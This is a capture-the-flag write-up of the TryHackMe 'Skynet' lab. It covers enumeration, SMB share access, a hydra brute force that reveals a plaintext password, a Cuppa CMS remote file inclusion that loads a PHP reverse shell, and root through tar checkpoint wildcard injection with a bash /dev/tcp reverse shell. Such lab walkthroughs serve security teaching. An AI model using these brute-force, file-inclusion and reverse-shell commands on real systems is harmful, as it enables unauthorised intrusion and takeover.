CTF Writeups
Skynet Tryhackme room
What is Miles password for his emails?
- We will start off with an nmap scan as usual :
─$ nmap -A -p- $IP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 14:12 EDT
Nmap scan report for 10.10.126.146
Host is up (0.017s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE TOP SASL PIPELINING UIDL CAPA RESP-CODES
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 IMAP4rev1 more have LITERAL+ ID IDLE ENABLE OK LOGIN-REFERRALS SASL-IR Pre-login listed post-login capabilities
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2021-10-10T13:12:56-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-10T18:12:56
|_ start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.40 seconds
samba is running as well as a webserver on port 80. There is also a pop3 service running
I will now run a gobuster scan:
─$ gobuster dir -u http://10.10.126.146/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.126.146/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/10/10 14:16:00 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/admin (Status: 301) [Size: 314] [--> http://10.10.126.146/admin/]
/ai (Status: 301) [Size: 311] [--> http://10.10.126.146/ai/]
/config (Status: 301) [Size: 315] [--> http://10.10.126.146/config/]
/css (Status: 301) [Size: 312] [--> http://10.10.126.146/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.126.146/js/]
/server-status (Status: 403) [Size: 278]
/squirrelmail (Status: 301) [Size: 321] [--> http://10.10.126.146/squirrelmail/]
===============================================================
2021/10/10 14:16:29 Finished
===============================================================- multiple interesting directories found
- forbidden on most, except for squirrelmail. This must be where we need the password for:
Time to enumerate smb to see what we can find, enum4linux is an option among others:
└─$ enum4linux $IP
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 10 14:22:49 2021 ==========================
| Target Information |
==========================
Target ........... 10.10.126.146
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.126.146 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP =============================================
| Nbtstat Information for 10.10.126.146 |
=============================================
Looking up status of 10.10.126.146
SKYNET <00> - B <ACTIVE> Workstation Service
SKYNET <03> - B <ACTIVE> Messenger Service
SKYNET <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ======================================
| Session Check on 10.10.126.146 |
======================================
[+] Server 10.10.126.146 allows sessions using username '', password '' ============================================
| Getting domain SID for 10.10.126.146 |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup =======================================
| OS information on 10.10.126.146 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.126.146 from smbclient:
[+] Got OS info for 10.10.126.146 from srvinfo:
SKYNET Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03 ==============================
| Users on 10.10.126.146 |
==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc: user:[milesdyson] rid:[0x3e8] ==========================================
| Share Enumeration on 10.10.126.146 |
========================================== Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing. Server Comment
--------- ------- Workgroup Master
--------- -------
WORKGROUP SKYNET[+] Attempting to map shares on 10.10.126.146
//10.10.126.146/print$ Mapping: DENIED, Listing: N/A
//10.10.126.146/anonymous Mapping: OK, Listing: OK
//10.10.126.146/milesdyson Mapping: DENIED, Listing: N/A
//10.10.126.146/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* =====================================================
| Password Policy Information for 10.10.126.146 |
=====================================================
[E] Unexpected error from polenum:
Traceback (most recent call last):
File "/usr/bin/polenum", line 16, in <module>
from impacket.dcerpc.v5.rpcrt import DCERPC_v5
File "<frozen importlib._bootstrap>", line 1007, in _find_and_load
File "<frozen importlib._bootstrap>", line 982, in _find_and_load_unlocked
File "<frozen importlib._bootstrap>", line 925, in _find_spec
File "<frozen importlib._bootstrap_external>", line 1414, in find_spec
File "<frozen importlib._bootstrap_external>", line 1388, in _get_spec
File "<frozen importlib._bootstrap_external>", line 1369, in _legacy_get_spec
File "<frozen importlib._bootstrap>", line 423, in spec_from_loader
File "<frozen importlib._bootstrap_external>", line 716, in spec_from_file_location
File "<frozen zipimport>", line 191, in get_filename
File "<frozen zipimport>", line 713, in _get_module_code
File "<frozen zipimport>", line 647, in _compile_source
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.19-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 122
0x00000005L : 'rpc_s_access_denied',
^
SyntaxError: invalid syntax
[+] Retieved partial password policy with rpcclient:Password Complexity: Disabled
Minimum Password Length: 5
===============================
| Groups on 10.10.126.146 |
=============================== [+] Getting builtin groups:[+] Getting builtin group memberships:[+] Getting local groups:[+] Getting local group memberships:[+] Getting domain groups:[+] Getting domain group memberships: ========================================================================
| Users on 10.10.126.146 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2393614426-3774336851-1116533619
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1001 Unix User\milesdyson (Local User)
[+] Enumerating users using SID S-1-5-21-2393614426-3774336851-1116533619 and logon username '', password ''
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-513 SKYNET\None (Domain Group)
S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\********* (Local User) ==============================================
| Getting printer info for 10.10.126.146 |
==============================================
No printers returned.
enum4linux complete on Sun Oct 10 14:23:49 2021
bad password policy. potential for brute-force maybe if needed. We found a fewUsernames and shares. enum4linux tells us that there is potential for anonymous login to the shares. let try it:
─$ smbclient //10.10.126.146/anonymous -U anonymous 1 ⨯
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> helpwe are now logged on in an anonymous share. We can now grab the files on the share using the get command :
getting file \logs\log1.txt of size 471 as logs\log1.txt (10.0 KiloBytes/sec) (average 10.0 KiloBytes/sec)
smb: \> get logs\log2.txt
getting file \logs\log2.txt of size 0 as logs\log2.txt (0.0 KiloBytes/sec) (average 5.5 KiloBytes/sec)
smb: \> get logs\log2.txt
getting file \logs\log2.txt of size 0 as logs\log2.txt (0.0 KiloBytes/sec) (average 3.7 KiloBytes/sec)When we cat the files on our own machine, there is a message for us aswell as a wordlist in one of the log files:
─$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
$ cat logs\\log1.txt
**************
*************
**********
************
***********
**************
**************
************
*************
**************
***********
┌──(kali㉿kali)-[~/CTF/THM/skynet]
└─$ cat logs\\log2.txtwe can use the wordlist to brute force the suirrelmail login form for the user found in samba:
$ hydra -l milesdyson -P logs\\log1.txt 10.10.126.146 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-10 14:53:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.126.146:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.126.146 login: milesdyson password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra)ans: *************
What is the hidden directory?
- samba reset password found in squirrelmail email: [redacted]
- login to samba share. there should a note in the/notes folder :
smb: \> cd notes
smb: \notes\> ls
] . D 0 Tue Sep 17 05:18:40 2019
.. D 0 Tue Sep 17 05:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 05:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 05:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 05:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 05:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 05:01:29 2019
important.txt N 117 Tue Sep 17 05:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 05:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 05:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 05:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 05:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 05:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 05:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 05:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 05:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 05:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 05:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 05:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 05:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 05:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 05:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 05:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 05:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 05:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 05:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 05:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 05:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 05:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 05:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 05:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 05:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 05:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 05:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 05:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 05:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 05:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 05:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 05:01:29 2019 9204224 blocks of size 1024. 5818896 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
smb: \notes\>
Let’s cat the file:
$ cat important.txt 130 ⨯
/45kra24zxs28v3yd
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wifeWe found a secret directory!! : /45kra24zxs28v3yd
What is the vulnerability called when you can include a remote file for malicious purposes?
- Simply google this one to find the answer. a quick copy and paste the question into google will bring you close enough ;)
remote file inclusionWhat is the user flag?
Time for more enumeration. Running another goubuster scan on the new directory found will reveal an admin panel for the cms:
If we search ‘cuppacms’ on exploit-db and there will be notes on an RFI exploit. we can use RFI to cat the /etc/passwd file. Let's try a reverse shell:
─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.126.146 - - [10/Oct/2021 15:37:14] "GET /php-reverse-shell.php HTTP/1.0" 200 -
─$ curl http://10.10.126.146/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.18.31:8000/php-reverse-shell.php
Now open a netcat listener anad we should receive a shell:
─$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.14.18.31] from (UNKNOWN) [10.10.126.146] 44042
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
14:37:15 up 1:30, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cd home
$ ls
milesdyson
$ cd milesdyson
$ cat user.txt
*****************************ans= **************
What is the root flag?
Taking a peek an dyson’s backup folder shows a world executable script owned by root found running every minute:
www-data@skynet:/home/milesdyson/backups$ ls
backup.sh backup.tgz
www-data@skynet:/home/milesdyson/backups$ ls -l
total 4576
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
-rw-r--r-- 1 root root 4679680 Oct 10 14:45 backup.tgz
www-data@skynet:/home/milesdyson/backups$We can maybe see if we can use tar to escalate. Check GTFOBins. We can use a command to spawn a reverse shell. We can get the backup script to read --checkpoint=1 --checkpoint-action=exec=/bin/sh should spawn a shell. Echo a reverse shell to the directory where the backup is happening and make executable:
$ echo '#!/bin/bash\nbash -i >& /dev/tcp/10.11.34.30/8888 0>&1' > /var/www/html/revshell
$ chmod +x revshell
$ touch /var/www/html/--checkpoint=1 #must specify absolute path
$ touch /var/www/html/--checkpoint-action=exec=bash\ shell #must specify absolute path- We can open up another netcat to get the shell:
$ nc -lvnp 8888
listening on [any] 6666 ...
connect to [10.11.34.30] from (UNKNOWN) [10.10.76.43] 36512
bash: cannot set terminal process group (2212): Inappropriate ioctl for device
bash: no job control in this shell
root@skynet:/var/www/html# cat /root/root.txt
cat /root/root.txt
*************************
root@skynet:/var/www/html#We now have access to the root flag :]
